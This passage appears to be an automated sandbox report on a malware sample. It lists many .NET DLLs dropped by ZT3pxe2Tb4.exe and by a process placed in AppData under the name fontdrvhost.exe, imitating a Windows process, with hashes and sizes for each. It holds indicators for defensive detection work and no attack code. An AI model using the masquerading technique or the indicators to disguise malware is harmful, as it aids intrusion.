                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
